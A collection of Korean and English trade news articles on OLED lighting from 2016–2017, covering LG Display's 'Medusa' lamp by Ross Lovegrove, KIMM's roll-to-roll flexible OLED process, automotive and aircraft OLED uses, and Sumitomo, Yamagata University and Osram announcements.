‘Medusa’는 세계적인 권위를 지닌 산업 디자이너 Ross Lovegrove와 협업한 OLED 조명으로, 해파리에서 착안하여 제작되었으며 중앙의 링에 연결 된 8개의 유연한 OLED 패널로 구성되어 있어 자유롭게 다른 모양으로 구부릴 수 있다. LG Display는 ‘Medusa’ 외에 3D 프린팅으로 제작 된 몸체와 flexible OLED가 결합 된 ‘Pyrosome’을 선보였었다.

 

LG Display의 flexible OLED 조명 ‘Medusa’

 

LG Display는 이번 수상을 계기로 flexible OLED 조명이 OLED 시장을 발전시키고 미래의 OLED 디자인에 커다란 이점을 제공 할 수 있을 것이라며 수상 소감을 전했다.

한편 MIAW 시상식은 2017년 6월 프랑스 파리의 grand hotel intercontinental Paris opera에서 개최 될 예정이다.

LG Display’s OLED lighting ‘Medusa’ OLED wins the MIAW awards

Medusa

During Euroluce 2017 held in Milan, Italy, LG Display showcased two OLED masterpieces called ‘Medusa’ and ‘Pyrosome’ made by Ross Lovegrove, known as ‘Captain Organic’. The collaboration with flexible LG OLED light panels attracted the attention of many visitors and many designers, architects, and lighting experts were inspired by the unique and aesthetic design.

‘Medusa’, one of the most outstanding collaboration masterpieces made with flexible LG OLED light panels, has won the MIAW (Muuuz International Awards) organized by the ArchiDesignClub in partnership with Muuuz magazine.

 

 

 

The awards intend to identify every year the most outstanding new products for Construction & Architecture Layout, Coatings & Materials, Home furniture, Lighting, Kitchen & Bath, and Outdoor, and Lovegrove’s ‘Medusa’ has proudly won the Lighting category.

LG Display said that by winning the award, LG OLED light will be promoted through an extensive communications distribution package and flexible LG OLED light panels will have a greater chance to develop the OLED market and provide massive benefits to future OLED design features.

 

<LG Display’s flexible OLED lighting ’Medusa’>

 

The award ceremony will be held in June, 2017 at the Grand Hotel Intercontinental Paris Opera.

[Euroluce 2017] LG Display, shows two new unique and novel lightings available only for OLED

LG Display had attracted great attention by showing two new unique and novel lightings available only for OLED based on the theme of ‘The Light of Inspiration’ in Euroluce 2017, the world largest lighting exhibition held in Milano, Italy from April 4 to 9 in local time.

LG Display had showed two types of new OLED lightings similar to underwater creature in collaboration with Ross Lovegrove who is an industrial designer with world-class authority.

 

The first introduced ‘Medusa’ is from jellyfish, it consists of eight flexible OLED panels connected to the center ring, they can flex freely in different shapes. Ross Lovegrove said, “I wanted to express the natural gravity that the strip takes a natural shape by gravity”.

 

<‘Medusa’ of LG Display>

 

The second introduced ‘Pyrosome’ is a combination of 3D printed body and flexible OLED panel, Ross Lovegrove called it “it is a hybrid technology that combines a linear structure with a planar OLED panel”, also said, “very complex forms and technologies have met, so nobody can easily imitate it”.

 

<‘Pyrosome’ of LG Display>

In addition, LG Display had introduced a variety of household products such as mirror type and transparent shelf type lighting as well as diamond-shaped, round-shaped, cylinder-shaped, square-shaped industrial lighting.

 

<Mirror type lighting and Diamond-shaped lighting of LG Display>

 

Meanwhile, LG Display is under construction of Gen5 OLED lighting fab (1,100 mm x 1,250 mm) in Paju with the aim of mass production in Q3-Q4 2017, and aims to produce monthly 15,000 sheets. A person related to LG Display said “If mass production is started and increased production quantity, production cost and panel price would be lowered so that it will have sufficient price competitiveness”, and mentioned that OLED lighting would have sufficient competitiveness in not only the design but the price in the lighting market.

 

<‘Medusa’ installed in the middle of LG Display booth>

[Euroluce 2017] LG Display, shows two new unique and novel lightings available only for OLED

LG Display had attracted great attention by showing two new unique and novel lightings available only for OLED based on the theme of ‘The Light of Inspiration’ in Euroluce 2017, the world largest lighting exhibition held in Milano, Italy from April 4 to 9 in local time.

LG Display had showed two types of new OLED lightings similar to underwater creature in collaboration with Ross Lovegrove who is an industrial designer with world-class authority.

 

The first introduced ‘Medusa’ is from jellyfish, it consists of eight flexible OLED panels connected to the center ring, they can flex freely in different shapes. Ross Lovegrove said, “I wanted to express the natural gravity that the strip takes a natural shape by gravity”.

 

<‘Medusa’ of LG Display>

 

The second introduced ‘Pyrosome’ is a combination of 3D printed body and flexible OLED panel, Ross Lovegrove called it “it is a hybrid technology that combines a linear structure with a planar OLED panel”, also said, “very complex forms and technologies have met, so nobody can easily imitate it”.

 

<‘Pyrosome’ of LG Display>

In addition, LG Display had introduced a variety of household products such as mirror type and transparent shelf type lighting as well as diamond-shaped, round-shaped, cylinder-shaped, square-shaped industrial lighting.

 

<Mirror type lighting and Diamond-shaped lighting of LG Display>

 

Meanwhile, LG Display is under construction of Gen5 OLED lighting fab (1,100 mm x 1,250 mm) in Paju with the aim of mass production in Q3-Q4 2017, and aims to produce monthly 15,000 sheets. A person related to LG Display said “If mass production is started and increased production quantity, production cost and panel price would be lowered so that it will have sufficient price competitiveness”, and mentioned that OLED lighting would have sufficient competitiveness in not only the design but the price in the lighting market.

 

<‘Medusa’ installed in the middle of LG Display booth>

 

[Euroluce 2017] LG Display, OLED만이 가능한 독특하고 기발한 두 가지 새로운 조명 선보여

LG Display가 현지 시간으로 4월 4일부터 9일까지 이탈리아 밀라노에서 열리는 세계 최대의 조명 전시회 Euroluce 2017에서 ‘The Light of Inspiration’이라는 주제를 바탕으로 OLED만이 가능한 독특하고 기발한 조명들을 선보여 큰 관심을 끌었다.
LG Display는 세계적인 권위를 지닌 산업 디자이너 Ross Lovegrove와 협업하여 수중 생물과 비슷한 2종의 새로운 OLED 조명을 선보였다.
첫 번째로 소개 된 ‘Medusa’는 해파리에서 착안하여 제작 된 것으로, 중앙의 링에 연결 된 8개의 유연한 OLED 패널로 구성되어 있어 자유롭게 다른 모양으로 구부릴 수 있다. Ross Lovegrove는 “중력에 의해 스트립이 자연스러운 모양을 취하는 natural gravity를 표현하고 싶었다”고 밝혔다.

<LG Display의 ‘Medusa’>

두 번째로 소개 된 ‘Pyrosome’은 3D 프린팅으로 제작 된 몸체와 유연한 OLED 패널을 결합 한 제품으로, Ross Lovegrove는 “선 형태의 구조물과 면 형태의 OLED 패널이 결합 된 hybrid technology이다” 라고 칭하며, “매우 복잡한 형태와 기술이 만났기 때문에 어느 누구도 쉽게 흉내내지 못할 것” 이라고 말했다.

<LG Display의 ‘Pyrosome’>

이 밖에 LG Display는 다이아몬드형과 원형, 실린더형, 사각형 등의 산업용 조명과 거울형과 투명 선반형 등 다양한 가정용 제품을 선보였다.

<LG Display의 거울형 조명과 다이아몬드형 조명>

한편 LG Display는 2017년 3~4분기 양산을 목표로 파주에 Gen5 OLED lighting fab(1,100 mm x 1,250 mm)을 건설 중에 있으며, 월 생산량은 15,000장을 목표로 하고 있다. LG Display 관계자는 “양산이 시작되고 생산량을 높이면 제작 비용과 패널 가격은 하락하여 충분한 가격 경쟁력을 가질 것”이라며, 디자인 뿐만 아니라 가격에서도 OLED 조명이 조명 시장에서 충분한 경쟁력을 지닐 것이라 언급하였다.

<LG Display booth 중앙에 설치 된 ‘Medusa’>

 

 

Softly bending OLED lighting like a paper, Development of Roll-to-Roll manufacturing technology

<Shin Kwon, Senior researcher of Korea Institute of Machinery and Materials (KIMM) & OLED production Roll-to-Roll production equipment, source: KIMM>

Korea Institute of Machinery and Materials (KIMM hereafter, Cheon-Hong Park, the president of KIMM), the Ministry of Science, ICT and Future Planning-affiliated developed the 300mm grade of Roll-to-Roll manufacturing technology that allows to produce flexible OLED* by simple process with GJM Co., Ltd (Mun-Yong Lee, CEO) for the first time in Korea.

 

The Printed electronics research laboratory of advanced production equipment research center in KIMM succeeded in applying traditional Roll-to-Roll printed electronics technology to the OLED production process. Using Roll-to-Roll vacuum evaporation equipment, it is possible to produce flexible OLED products inside a single chamber as evaporating OLED light emitting organic layer and metallic electrode to roll type film in order. Available OLED products consist of many organic, inorganic layers of 1~hundreds nanometer (nm) level of thin and each layers are manufactured through vacuum thermal evaporation process.

 

Producing the flexible OLED display must go through complicated processes until now. The method that has been used so far is that attaching a film on the glass plate and passing it over the evaporation process to produce OLED, and then separating a film from the plate. The one-side curved display of smart phone screen which was launched by Korea conglomerate was made in the same manner of process which is attaching a film on a glass plate or coating and then circulating evaporation equipment to produce OLED and separating OLED from the glass plate. There were demerits of the need for adding additional process of attaching and detaching a film as well as for various additional evaporation equipment upon necessary steps.

 

Applying the currently developed technology, it is possible to produce OLED with ‘multi-layer evaporation’ process that evaporates organic layer and inorganic layer sequentially on top of a film after letting a roll type film which is rolled inside a vacuum chamber flow. The time and facilities required for production are greatly reduced, therefore, not only large companies but also small and medium-sized enterprises can produce flexible OLED.

 

This OLED producing method is expected to be used in the lighting industry first since it can be produced by surface unit unlike point unit of the existing LED, and be possibly made in any desired shape due to its flexibility.

 

Shin Kwon, senior researcher of KIMM explained “With Roll-to-Roll vacuum evaporation equipment, it can be used for continuous production of flexible OLED which is notable display for the next generation. Especially in the display industry, it is a key technology to secure the technology gap feasible to contribute to gain supremacy over China from its rapid pursuit while Korean R&D is stagnant.

 

Also added “we are under development of fine pattern mask align technology which allows to produce individual pixels Red/Green/Blue used in actual display product. When it’s completed, it can be applied to the high resolution display and is a strong technology differentiated from Fraunhofer in Germany and Konica Minolta in Japan developing similar technologies.

 

This task was conducted for the leading study sponsored by the ACE*** program which is a technical business support program of KIMM, and has been conducting with GJM Co., Ltd. with a support of the economic cooperation business of the Ministry of Trade, Industry and Energy since Oct. 2015. GJM Co., Ltd. as a hidden champion holding core technology in OLED, recently made a delivery performance in Taiwan, Japan, and China and is pushing ahead with full-scale equipment commercialization.

종이처럼 부드럽게 휘어지는 OLED 조명, 롤투롤 생산기술 개발

<한국기계연구원 권신 선임연구원과 OLED 생산 롤투롤 생산 장비, source: 한국기계연구원>

 

미래창조과학부 산하 한국기계연구원(이하 기계연, 원장 박천홍)은 중소기업 ㈜지제이엠(대표 이문용)과 함께 간단한 공정으로 플렉서블(Flexible) OLED*를 만들 수 있는 300 ㎜급 롤투롤(Roll-to-Roll) 생산 기술을 국내 최초로 개발했다.

 

기계연 첨단생산장비연구본부 인쇄전자연구실은 기존의 롤투롤 인쇄전자 기술을 OLED 생산 과정에 적용하는 데 성공했다. 롤투롤 진공증착 장비를 이용하면 롤 형태의 필름에 OLED 발광 유기층과 금속 전극층을 차례대로 증착**하면서 하나의 챔버 안에서 유연한 OLED를 생산할 수 있다. 생산 가능한 OLED 제품은 1 ∼ 수 백 나노미터(㎚) 수준의 매우 얇은 다층의 유기, 무기 박막으로 구성되며 각 층은 진공 열증착 공정을 거치며 제조된다.

 

지금까지 유연한 OLED 디스플레이를 만들기 위해서는 복잡한 공정을 거쳐야 했다. 유리판에 필름을 붙인 다음 그 위에 증착과정을 거치며 OLED를 만들고 다시 그 유리판에서 필름을 분리하는 방식을 이용해왔다. 국내 대기업에서 출시한 스마트폰 중 화면의 한 쪽만 휘어진 디스플레이도 같은 방식으로 유리에 필름을 부착하거나 코팅한 다음 증착장비를 순환하며 OLED를 만들고 유리에서 다시 OLED를 분리하는 공정으로 만들었다. 필요한 단계에 따라 여러 개의 증착장비가 추가로 필요할 뿐 아니라 필름을 부착하고 분리하는 추가 공정이 필요하다는 단점이 있었다.

 

이번에 개발된 기술을 적용하면 진공상태의 챔버 안에 롤 형태로 감겨있는 필름을 흐르게 한 뒤 그 위에 원하는 유기층과 무기층을 연속적으로 증착시키는 ‘다층 증착’ 공정으로 OLED를 제작할 수 있다. 제작에 필요한 시간과 설비가 대폭 감소해 대기업 뿐 아니라 중소‧중견기업도 유연한 OLED를 제작할 수 있다.

 

이렇게 생산된 OLED는 기존 LED와 달리 점이 아닌 면 단위의 제작이 가능하고, 유연한 성질로 원하는 모양을 만들 수 있어 조명산업에 가장 먼저 활용될 것으로 전망된다.

 

기계연 권신 선임연구원은 “롤투롤 진공증착 장비를 이용하면 차세대 디스플레이로 주목받는 플렉서블 OLED를 간단한 공정으로 연속 생산할 수 있다”며 “특히 디스플레이 분야는 국내 연구개발이 정체되어 있고 중국의 추격이 가파른 만큼 기술격차를 확보하고 우위를 점하는데 기여할 수 있는 핵심기술”이라고 설명했다.

 

또 “실제 디스플레이 제품에 사용되는 Red/Green/Blue 개별 화소를 제작할 수 있는 미세 패턴 마스크 얼라인 기술도 개발 중”이라며 “완성되면 고해상도 디스플레이로의 적용도 가능할 뿐 아니라 유사한 기술을 개발하고 있는 독일 프라운호퍼 연구소나 일본 코니카 미놀타사와 차별화되는 강점 기술”이라고 덧붙였다.

 

이번 과제는 기계연 자체 기술사업화 지원 프로그램인 ‘ACE’*** 프로그램의 지원을 받아 선행연구를 진행했으며, 이어 2015년 10월부터 산업통상자원부 경제협력권 사업의 지원을 받아 ㈜지제이엠과 함께 수행하고 있다. ㈜지제이엠은 OLED 증착원 핵심기술을 보유한 강소기업으로 최근 대만, 일본, 중국 기업에 증착원을 납품하는 실적을 거뒀으며 본격적인 장비 상용화를 추진하고 있다.

 

한편 OLED 분야 시장조사 전문기관 UBI Research ‘2016 OLED Lighting Annual Report’에 따르면 조명용 OLED panel 시장은 2016년 약 US$ 114 million 규모를 형성하고 2020년에는 US$ 1,630 million을 형성할 것이라 전망했다. 또한 ‘2016 Flexible OLED Annual Report‘에 따르면 2017년에는 flexible AMOLED panel이 AMOLED 전체 시장의 약 50%를 차지할 것으로 전망하고 2020년에는 US$ 40,864 million의 시장을 형성할 것으로 전망 하는 등 관련 분야의 지속적인 성장이 예상되고 있다.

 

OLED enabling various styling and designs is perfect to lighting for automobiles

Applications of various lighting such as LED and OLED etc. have been expanded so as to implement unique designs and diversified functions of own brand by each automotive company as well as developments of automotive industry including smart-car and connected-car etc. are being made at the same time. In this regard, Center Head Ju Jae-young of Korea Photonics Technology Institute stated current situation by saying “Lighting for vehicles belongs to the business which expects profitability, but it is not easy for late starters to break in because entry barrier is high from characteristics of automotive industry. Ultimately, whether to stimulate purchase desires is important.” Also, he counted ‘styling possibilities’ as one of successful LED lighting by saying “The reason of getting more popularity of LED than existing halogen and HID is derived from the fact that LED has strong points in designs.”

And then, the Head forecasted like “The exterior deco of lamp market for automobiles overtook the interior deco market from the start of 2013, and 3.1B USB market will be made in 2019 by achieving annual 11.6% growth in average to 2019 from 2014,” and said “The exterior deco market will grow up over 15% annually, and DRL (Daytime Running Lamp) and Head lamp are leading market due to their high growth rates.”

Besides, Center Head Ju Jae-young stated “In order to enter market by OLED, it has to stimulate purchase desires with new designs which do not substitute LED simply,” and added “There are possibilities if designs are unique, and stimulate sensitivity like Fun- VII concept car of Toyota or lighting of Chrysler having been disclosed to the public in 2013.”

161025_1

<Fun Vii Concept Car of Toyota Source: Toyota official homepage>

161025_2

<Floating island bezel unveiled from Chrysler, Source: www.metrododgedeals.com>

Like this, OLED is thin, light and can be bended characteristically, and has strong points such like free designs are available, so it is getting a lot of interests as next-generation illuminants including indoor lighting etc. as well as lighting for vehicles. According to 2016 OLED lighting annual report having been published in August 2016 by UBi RESEARCH, it explains that OLED lighting is known to display same performance with LED in R&D levels regarding characteristics of brightness and lifetime etc. as eco-friendly lighting and having high energy-efficiency, thus OLED seems to have sufficient competitiveness only if requested brightness is satisfied along with each automotive company.

OLED Technology, extend the field from automobiles to airline industry.

It is expected that we may be able to meet flights with OLED technology soon.

In existing OLED market, display is applied in mobile field and lighting is applied in indoor lighting field, and it was known several companies seem to be proceeding projects to apply it at either rear lamp or dash board area of the automobile.

However, in IFA 2016 held in Berlin Germany, LG vice president of HE Bongseok Kwon had reporter meeting where he said “we are currently in negotiation with two global airlines to install OLED display at front monitor and window, and the period of application must be discussed for not only seats but also including all parts such as windows.

Especially, several companies including Lumiotech, OSRAM, and LG Inotech already introduced technologies for applying OLED in indoor purposes as well as other fields, and third panel companies are known to be developing technologies for engrafting airline industry, so there is much attention of the outcome of new application.

OLED is designed with thin and light characteristics as well as flexibility where it is good at utilizing space without taking up large volume. Due to its characteristics, the installation is easy without location or space restrictions. So if OLED is applied in window then the flight crew can control the light penetration without having to check the window, and also people will be able to check the flight information they desire through display, and diversify the size and shape of the main display and dashboard.

Aside from these visual effect, it is expected to lower the fuel usage by decreasing the total weight of the flight. According to the contents presented in UK governmental emerging institution CPI (Centre for Process Innovation) in 2014, the fixed fuel usage is expected to decrease by applying OLED due to decreased weight of the flight fuselage and fuel, and the fuel consumed by air-conditioning can also be reduced due to low power consumption and heat, as well as the exhaustion of greenhouse gas is expected to be minimized.

<Concept picture of flight’s interior with CPI’s OLED display applied>

Along with this, OLED related application and its industry is expected to develop continuously. According to 2016 OLED Display Annual Report published by the market research company Ubi industry research, AMOLED market is expected to be worth 14,800 million USD in 2016, and approximately 71,705 million USD in 2020 where the average yearly growth of about 49%. Also, starting from 2019 where companies’ investments actually begin, the profit for OLED lighting will also largely increase which it is expected to reach above 7,500 million USD by 2025. Therefore, it is expected to see various types of applications with OLED display or lighting in the near future.

OLED 기술, 자동차에 이어 항공산업까지 그 영역 확대

유기발광다이오드(OLED) 기술이 접목 된 비행기를 곧 만날 수 있을 것으로 보인다.

기존의 OLED 시장에서 display는 모바일 분야에, lighting은 실내조명 분야에 적용 되었고, 몇몇 업체에서는 차량의 rear lamp dash board쪽에 이를 적용하기 위한 프로젝트를 진행 중인 것으로 알려졌었다.

하지만 국제 가전전시회(IFA) 2016이 열렸던 독일 베를린에서 LG 권봉석 HE사업본부장(부사장)이 기자 간담회를 갖고, “해외 항공사 2곳과 항공기용 정면 모니터와 창문 등에 OLED 디스플레이를 설치하는 방안을 협의 중이며, 이는 좌석용 뿐만 아니라 창문 등을 모두 포함하는 것으로 적용 시점은 논의해야 할 것이라 말하며 OLED 산업이 본격적으로 확대 되는 것을 밝혔다.

특히나 루미오텍이나 오스람, 그리고 LG이노텍 등을 비롯한 몇몇 업체가 실내용 OLED 실내 조명 및 타 분야에 OLED를 적용하기 위한 기술을 선보이기도 하였으며, 타 패널 업체도 항공 산업 접목을 위해 기술개발 중인 것으로 알려져 새로운 application 창출에 대한 귀추가 주목되고 있다.

OLED는 얇고 가벼운 특성과 함께 휘어지도록 설계가 가능하여 큰 부피를 차지하지 않고 공간활용 측면에서 유리하다. 이러한 특성으로 위치나 공간의 제약없이 쉬운 설치가 가능하기에 창문에 OLED가 탑재된다면 투과율 조절을 통해 승무원이 창문을 확인 할 필요 없이 자동으로 빛의 투과를 조절하는 것은 물론, 디스플레이를 통해 승객들이 원하는 비행 정보 등을 확인 할 수 있을 것이며, 중앙 디스플레이와 계기판 등의 크기와 모양을 다양화 할 수 있을 것이다.

이러한 시각적 효과 외에도 비행기의 총 중량을 낮춰 연료 절감에 기여할 것으로 기대된다. 2014년 영국 정부 출현기관 프로세스혁신센터(CPI, Centre For Process Innovation)에서 발표한 내용에 따르면, OLED 적용 시 기존 대비 항공기 동체 및 연료 중량이 감소되어 고정적인 연료 소비 절감효과를 가질 것으로 예측하였으며, 추가적으로 소비전력과 발열 또한 낮아 냉방으로 소비되는 연료 또한 절감하고 온실가스 배출 또한 최소화 할 수 있을 것으로 기대하고 있다.

<CPI의 OLED display가 적용 된 비행기 내부 컨셉 사진>

이와 더불어 OLED 관련 application과 시장도 꾸준히 성장할 것으로 보인다. 시장조사업체 유비산업 리서치에서 발간한 2016 OLED Display Annual Report에 따르면, 2016AMOLED 시장이 14,800 million USD 규모로 형성될 것으로 예측하였으며, 2020에는 약 71,705 million USD로 약 49%의 연평균 성장률이 예측하고 있다. 또한 OLED lighting 역시, 업체들의 투자가 본격적으로 시작되는 2019년부터 매출액이 큰 폭으로 증가해 2025년에는 7,500 million USD 이상의 시장이 형성 될 것으로 전망하기에, 앞으로 다양한 형태로 OLED display 혹은 lighting이 접목 된 application을 만나게 될 수 있을 것으로 기대 된다.

Light+building 2016 LGD OLED Lighting

LG Display is showcasing its latest advanced OLED light products and solutions at Light+Building 2016

[Light building 2016] Osram OLED Rear Lamp

Osram is showcasing its OLED rear lamp for cars at Light+Building 2016

[Light+Building 2016] Sumitomo Chemical to Exhibit Polymer OLED Lighting

Sumitomo Chemical will exhibit its polymer OLED lighting at “Light+Building 2016,” one of the world’s largest trade fairs for lighting and building technology, to be held in Frankfurt, Germany, from March 13 to March 18, 2016.

This is the third time for Sumitomo Chemical to exhibit its products at the trade fair, following its previous participation in 2014. Sumitomo Chemical will run a booth at the trade fair, inviting the world-renowned Japanese lighting designer Motoko Ishii as the art director for the exhibit.

Sumitomo Chemical’s exhibit, named “OLED JARDIN,” symbolises a “Garden in the Sky” as formed from polymer OLED lighting panels, creating an approachable space of a vast expanse with a taste of Japanese grace added.

In addition to OLED JARDIN, Sumitomo Chemical will exhibit its newly-designed OLED panels, improved for brightness and luminance efficiency from those displayed in the previous trade fair. The new polymer OLED panels, available in a range of colors, shapes and sizes, provide a greater degree of flexibility in the design for various spaces and applications.

Following the exhibit at Light+Building 2016, Sumitomo Chemical will start the sales of its new product line-up consisting of polymer OLED lighting panels in April this year, aiming to further expand its OLED lighting business.

 

 

 

[Light+Building 2016] Sumitomo Chemical, 새로운 고분자 OLED 조명 패널을 전시할 예정

Sumitomo Chemical은 독일 프랑크푸르트에서 3월 13일부터 18일까지 열리는 세계 최대 수준의 조명산업 무역 박람회 “Light+Building 2016”에서 고분자 OLED 조명을 전시할 예정에 있다.

이번 공개는 Sumitomo Chemical의 세 번째 무역박람회 전시로, 가장 최근에는 2014년에 전시한 바 있다. Sumitomo Chemical의 이번 전시 부스는 세계적으로 유명한 일본인 조명디자이너인 Motoko Ishii가 아트디렉터를 맡아 꾸밀 예정이다.

이번 Sumitomo Chemical의 전시는 하늘 속의 정원을 상징하는 “OLED JARDIN”라는 이름으로 고분자 OLED 조명 panel들을 사용해 공개될 예정이다. 넓으면서도 친근한 공간 내에 일본풍의 우아함을 강조한 컨셉이다.

“OLED JARDIN”에서 Sumitomo Chemical은 이전 무역박람회에서 전시된 패널보다 밝기와 발광효율이 향상된 OLED 패널을 전시할 예정이다. 해당 고분자 OLED 패널은 색과 모양, 크기를 변화시킬 수 있으며 높은 유연성을 가지기 때문에 다양한 공간과 어플리케이션에 적용될 수 있을 것으로 전망된다.

Light+Building 2016 전시에 뒤이어, Sumitomo Chemical은 고분자 OLED 조명 패널로 이루어진 새로운 제품 라인업을 이번 년도 4월에 판매할 예정이다.

[Lighting Japan 2016] Yamagata University Develops Low Cost Flexible OLED Encapsulation

Innovation Center for Organic Electronics in Yamagata University in Japan discussed low cost flexible OLED encapsulation in Lighting Japan 2016 conference. Existing flexible OLED encapsulation mainly used hybrid encapsulation structure that forms multi-layer thin film passivation layers on top of OLED, and then applying adhesive organic material and laminating gas barrier film. The encapsulation structure presented by Yamagata University forms, of the hybrid encapsulation structure, thermoset resin and barrier film above OLED without multi-layer thin film passivation, and laminate at approximately 130 °C. Yamagata University announced that they were successful in transparent flexible OLED panel development on January 13 using encapsulation, and that this panel will be presented in Printable Electronics 2016 in Tokyo from January 27.

 

The OLED panel to be exhibited is a leaf shaped of 45 mm width, 110 mm length, weighs less than 1.2g, and 250 um thick transparent film substrate that can be folded.

 

According to Yamagata University, if the newly developed encapsulation is applied, the OLED lighting panel price can be reduced as passivation layer is not used. Also, Yamagata University revealed as it can satisfy both transparent and flexible categories simultaneously, it is estimated that it will become a key technology in future transparent flexible OLED lighting development.

 

Low Cost Flexible OLED Encapsulation, Yamagata University

Low Cost Flexible OLED Encapsulation, Yamagata University

Sumitomo Chem. Aims for General Lighting Market with P-LED

Sumitomo Chemical’s Decorative P-LED Lighting Panel, Lighting Japan 2016

Sumitomo Chemical’s Decorative P-LED Lighting Panel, Lighting Japan 2016

Sumitomo Chemical revealed that they are planning to enter the general lighting market with solution process applied P-LED (polymer OLED).

 

Sumitomo Chemical is a company developing polymer and solution process applied OLED lighting panel. The company began actively selling decorative OLED lighting panel from H2 2015.

 

In Lighting Japan 2016 exhibition, Sumitomo Chemical announced that through their polymer materials and process technology, 80-90% of evaporation materials efficiency, and lifetime of approximately 20,000 hours at white 60-80 lm/w have been achieved. From 2017, they are planning to commercialize solution process OLED lighting panel as general lighting, as well as for decorative use, and revealed that the biggest issues are cost and improvement of consumers’ OLED awareness.

 

According to these issues, Sumitomo Chemical explained that although the cost of emitting area formed through solution process, cost down of evaporation formed emitting area and electrode part is required further. Although the 20,000 hours of lifetime is satisfactory, as consumers are aware that LED lighting’s lifetime is 40,000 hours or longer, Sumitomo Chemical pointed out it is important to change consumer’s OLED lighting awareness and understanding of lighting products.

 

by Moojong Lim, reporter@olednet.com

[Lighting Japan 2016]야마가타 대학, 저비용 flexible OLED용 encapsulation 개발

일본 야마가타 대학에 있는 유기 전자 혁신 센터의 OLED 그룹은 Lighting Japan 2016의 conference에서 저비용 flexible OLED용 encapsulation에 대해 발표하였다. 기존 flexible OLED의 encapsulation은 OLED위에 한층 이상의 다층 박막 passivation layers를 형성한 후 adhesive organic material을 도포하고 gas barrier film을 laminating 하는 하이브리드 encapsulation 구조가 주로 사용되었었다. 이번에 야마가타 대학에서 발표한 encapsulation 구조는 하이브리드 encapsulation 구조에서 다층 박막 passivation 없이 thermoset resin과 barrier film을 OLED 위에 형성한 후 약 130도의 온도로 합착한다. 야마가타 대학은 encapsulation을 사용하여 지난 13일 ‘투명 플렉시블 OLED 패널’ 개발 및 프로토 타입에 성공했다고 발표 했으며, 이 패널은 27일부터 도쿄 빅사이트에서 열리는 ‘인쇄 전자 전시회 2016’에서 전시할 계획이라고 밝혔다.

전시될 OLED 패널은 폭 45mm, 길이 110mm의 나뭇잎 형태로 무게는 1.2g보다 가벼우며, 두께는 250um의 투명한 필름 기판으로 접을 수 있다.

야마가타 대학에 따르면, 새로 개발한 encapsulation을 적용하면 passivation layer를 사용하지 않아 OLED lighting panel의 가격을 낮출 수 있으며 투명과 플렉시블을 동시에 충족시킬 수 있기 떄문에 앞으로의 투명 플렉시블 OLED lighting 개발에 핵심 기술이 될 것으로 예상한다라고 밝혔다.

저비용 flexible OLED용 encapsulation, 야마가타 대학

[Lighting Japan 2016] LED Lighting Industry Crisis. Solution?

Osram Bussiness Unit Digital Systems's CEO, Geert van der Meer, Lighting Japan 2016

Osram Bussiness Unit Digital Systems’s CEO, Geert van der Meer, Lighting Japan 2016

 

In Lighting Japan 2016 Keynote Session, Geer van der Meer, CEO of Osram Business Unit Digital Systems, suggested directions for future lighting industry.

 

Geert van der Meer explained that the current lighting market is rapidly adopting LED, but the large volume of Chinese products is decreasing the price of LED source and device quickly. He emphasized that with the trend of disappearance of lighting companies’ profit, new business format is required to create profit.

 

The new businesses suggested by Osram are embedded lighting, and connected and smart lighting. He suggested lighting industry should move toward where the lighting can be used as part of building materials through internal installations and utilization as indirect illumination, and adopt smart system and form smart building and furthermore, smart city.

 

The current lighting market’s players are being joined by IT related companies, BMS (business management system) companies, and electronic appliances companies, and its megatrend is changing rapidly. Accordingly, Osram is expanding from the existing lighting to lighting electronics such as module and control gears, lighting solution system, and specialty lighting such as OLED and automotive. Osram also revealed that they took over a wireless energy management system company called ENCELIUM and intensifying focus on smart lighting system business.

 

Smart system provides many different functions such as energy reporting, remote and preventative maintenance, personal lighting control, and zone analysis among others and can optimize energy reduction, maintenance cost reduction, and workspace environment. Van der Meer emphasized that new function can be created through lighting used area’s data analysis and become the focus of future lighting analysis.

 

[Lighting Japan 2016]Sumitomo Chem., P-LED로 일반 조명시장 목표.

Sumitomo Chemical의 decoration용 P-LED lighting panel, Lighting Japan 2016

Sumitomo Chemical에서 solution process를 적용한 P-LED(Polymer OLED)로 일반 조명 시장에도 진입할 계획이 있다고 밝혔다.

Sumitomo Chemical은 polymer와 solution process,를 적용한 OLED lighting panel을 개발하고 있는 업체로서 2015년 하반기부터 데코레이션용 OLED lighting panel을 본격적으로 판매하기 시작하였다.

Lighting Japan 2016 전시장에서 Sumitomo Chemical 관계자는 “현재 Sumitomo Chemical이 보유하고 있는 polymer 재료와 공정기술로도 증착 재료 수준의 80~90%의 효율을 확보하였고 수명도 white 60~80lm/w 기준으로 약 20,000 시간 개발을 완료하였다. 2017년부터 데코레이션용 뿐만 아니라 일반조명으로 solution process OLED lighting panel을 상업화할 계획에 있으며 가장 큰 이슈는 cost와 소비자들의 OLED에 대한 인지도 향상이다.”라고 밝혔다.

이슈에 관련하여 “Solution process로 형성하는 발광층 부분은 cost가 저렴하지만 증착으로 형성하는 발광층과 전극부분의 cost down이 더욱 필요하며, 수명도 20,000시간이면 충분하지만 LED 조명의 수명이 40,000시간 이상으로 소비자들의 인식이 높아져있기 때문에 OLED lighting에 대한 소비자들의 인지도향상과 조명제품에 대한 인식을 변화시키는 것이 중요하다.”라고 하였다.

[Lighting Japan 2016] LED 조명산업의 위기, 해결책은?

Osram Bussiness Unit Digital Systems의 CEO, Geert van der Meer, Lighting Japan 2016

Lighting Japan 2016의 keynote session에서 Osram Bussiness Unit Digital Systems의 CEO인 Geert van der Meer은 조명산업이 앞으로 나아가야 할 방향에 대해 제시하였다.

Geert van der Meer은 “현재 조명시장은 LED화가 급격하게 진행되고 있지만 중국업체들의 물량 공세에 LED source와 기구 가격이 급격히 하락하고 있어 조명 제조업체들의 이윤창출이 없어지고 있는 추세라며, 이윤을 창출하기 위한 새로운 비즈니스 형태가 필요하다.”라고 강조하였다.

Osram이 제시한 새로운 비즈니스는 embedded lighting과 connected and smart lighting으로 조명들을 내설하거나 간접조명으로의 활용을 통해 실내 인테리어와 같은 건축자재의 일부로 사용하고, smart system을 도입하여 smart building과 더 나아가 smart city를 구성하는 방향으로 나아가야 한다고 발표하였다.

현재 조명시장은 기존의 조명업체 뿐만아니라 IT관련업체와 BMS(Business Management System)업체, 가전업체들까지 가세하고 있는 추세여서 조명산업의 Megatrend가 빠르게 변하고 있다. 이에 따라 Osram 기존 조명에서 탈바꿈하여 모듈과 control gears와 같은 조명용 electronics와, Lighting solution system, OLED와 automotive와 같은 specialty lighting등으로 사업확장을 진행 중이며, 특히 ENCELIUM이라는 wireless energy management system 업체를 인수하여 smart lighting system 사업을 집중적으로 강화하고 있다고 밝혔다.

